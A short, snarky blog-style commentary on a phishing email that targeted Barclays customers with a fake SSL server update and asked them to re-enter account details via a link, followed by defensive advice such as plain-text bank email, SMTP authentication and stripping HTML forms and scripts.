[Barclays Phishing Message: SSL Update Scam]

Last April, Barclays Bank clients were sucked in by an e-mail proclaiming the firm’s great pride in its flashy new SSL servers. The required finishing touch?

Simply “update your account info at the following link…”

Of course.

Apparently, several Barclays customers proved Darwin’s theory by complying. How do we know?

The entrepid phisher has re-issued the SSL scam. Why do people keep falling for this nonsense? “Because it’s not gonna happen to me.”

Study after study shows that many have never heard of phishing or other scams, and among those who have, a huge chunk thinks the bank or IT department will dig them out of any mudhole they wade into.

Fact is, network managers can break up the vast majority of these scams. On the email sender side, Barclays, et al can easily switch from blasting missives filled with logos and pretty HTML-formatted paragraphs to plain text dispatches. While they’re not as cute, you can’t hide redirects or dangerous scripts in plain text email.

On the receiving side, admins can deploy SMTP authentication as part of their overall network content filtering schema, which should already include interdiction of spam and viruses. In addition, those with stiff spines and upper management backing would be well advised to set their anti-spam systems to disable dangerous HTML (like forms and embedded links), as well as scripts.